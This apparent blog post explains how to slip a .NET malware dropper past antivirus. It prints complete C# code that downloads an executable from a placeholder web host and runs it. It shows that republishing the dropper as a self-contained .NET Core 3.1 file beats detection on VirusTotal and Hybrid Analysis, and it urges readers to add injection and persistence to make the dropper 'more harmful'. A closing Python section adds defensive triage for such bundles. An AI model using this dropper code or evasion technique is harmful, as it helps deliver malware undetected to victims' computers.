Antivirus evasion techniques in .NET

Cherif Yassir
3 min read · Feb 17, 2021
Hacker vs Antivirus

Before we start, I want to tell you that everything you find here is for educational purposes only, so use it at your own risk.

Let’s start by making this dropper (a dropper is just a malicious program designed to deliver a specific piece of malware to a victim’s computer). My intention is to first make it detectable by AV, then make it undetectable. I wrote a simple dropper in C# (since I use it in my daily job).

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Threading;
using System.Threading.Tasks;

namespace Lkala
{
    class Program
    {
        static async Task Main(string[] args)
        {
            // The payload is written next to the dropper under a fixed name.
            string filePath = Path.Combine(Environment.CurrentDirectory, "Lkala-update.exe");

            // Remove a stale copy first; if it is locked because it is still
            // running, fall back to killing that process before deleting.
            if (File.Exists(filePath))
                try
                {
                    File.Delete(filePath);
                }
                catch (SystemException xe) when (xe is UnauthorizedAccessException)
                {
                    SaveDelete(filePath);
                }

            // Download the payload and run it once the transfer completes.
            using var webClient = new WebClient();
            webClient.DownloadFileCompleted += DownloadFileCompleted(filePath);
            await webClient.DownloadFileTaskAsync(new Uri("http://yourwebsite/Lkala-update.exe"), filePath);

            // Local function (C# 8): kill the process that holds the file, then delete it.
            static void SaveDelete(string name)
            {
                Process[] proc = Process.GetProcessesByName(Path.GetFileNameWithoutExtension(name));
                if (proc.Length > 0)
                {
                    proc[0].Kill();
                    Thread.Sleep(500);
                    File.Delete(name);
                }
            }

            // Completion handler that launches the downloaded file.
            static AsyncCompletedEventHandler DownloadFileCompleted(string filePath) =>
                new AsyncCompletedEventHandler((object sender, AsyncCompletedEventArgs args) =>
                {
                    Process.Start(filePath);
                });
        }
    }
}

I know it’s a shitty dropper, but you can add process injection, melt, mutex, startup run, etc., to make it more powerful and harmful ;)

When you compile this code with the .NET Framework (just for info, it’s C# 8) and upload the file to VirusTotal and Hybrid Analysis for static and runtime scans, you will discover that it is detected by 2 antivirus engines, and Hybrid Analysis tells you that it is a malicious file for sure.

Virustotal static scan
Hybrid-analysis runtime scan

So, our dropper is detected in both the static and the runtime scan.

ExeInfo PE tells us that the dropper is a .NET program.

Exeinfo

Then I will try to compile it with .NET Core 3.1 and publish it using this configuration.

publish config

Hybrid Analysis uses Windows 7, which is why we will target this OS version.

Let’s scan our dropper with VT and HA again.

Bingo!!

VT static scan for dotnet core dropper
HA runtime scan

If you open it with ExeInfo PE, you will notice that it tells you this program was coded in C++. That is another topic; we will discuss it later.

Exeinfo PE result

The problem with this technique is that your file will be much bigger than usual. At first the file was 7 KB, but with the .NET Core publish the size becomes 59 MB.
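Both symptoms above (ExeInfo PE reporting C++, and the jump to 59 MB) come from the same cause: a self-contained single-file publish wraps the managed assembly and the runtime inside a native apphost, so the outer PE has no CLR header for a tool or a static signature written against a .NET Framework binary to key on. The Python below is an added triage example, not code from the post: it reports whether a PE carries a CLR header and, if not, whether it carries the single-file bundle marker, assuming (from the .NET apphost layout) that the marker is SHA-256 of ".net core bundle" preceded by an 8-byte bundle-header offset that is zero in a plain apphost; fake_pe builds constructed, headers-only images as sample input.

```python
import hashlib
import struct

# Assumption (from the .NET apphost layout): a single-file bundle carries this
# 32-byte marker, preceded by an 8-byte bundle-header offset (zero in a plain apphost).
BUNDLE_SIGNATURE = hashlib.sha256(b".net core bundle").digest()


def clr_directory(pe: bytes):
    """(rva, size) of the CLR runtime header (data directory 14), or None if absent."""
    if pe[:2] != b"MZ" or len(pe) < 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    opt = e_lfanew + 4 + 20                       # optional header follows the COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dirs = opt + (96 if magic == 0x10B else 112)  # data directories: PE32 vs PE32+
    if len(pe) < dirs + 15 * 8:
        return None
    rva, size = struct.unpack_from("<II", pe, dirs + 14 * 8)
    return (rva, size) if rva and size else None


def bundle_header_offset(pe: bytes):
    """Bundle-header offset if the single-file marker is set, else None."""
    pos = pe.find(BUNDLE_SIGNATURE)
    if pos < 8:
        return None
    offset = struct.unpack_from("<Q", pe, pos - 8)[0]
    return offset or None                          # zero offset = apphost without a bundle


def classify(pe: bytes) -> str:
    """Defender triage: which kind of .NET artefact, if any, is this PE?"""
    if clr_directory(pe):
        return "managed assembly (CLR header present)"
    if bundle_header_offset(pe):
        return "dotnet single-file bundle (native apphost, CLR header absent)"
    return "no .NET markers found"


def fake_pe(clr_rva: int = 0, trailer: bytes = b"") -> bytes:
    """Constructed headers-only PE32+ image used as sample input (not a real binary)."""
    hdr = b"MZ" + bytes(0x3C - 2) + struct.pack("<I", 0x40)          # e_lfanew -> 0x40
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)                                               # PE32+ optional header
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<II", opt, 112 + 14 * 8, clr_rva, 72 if clr_rva else 0)
    return hdr + bytes(opt) + trailer
```

Run classify() over the bytes of a suspicious executable; a bundle verdict is a cue to extract and scan the embedded managed assembly rather than trust the "native C++" label.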

Goodbye.
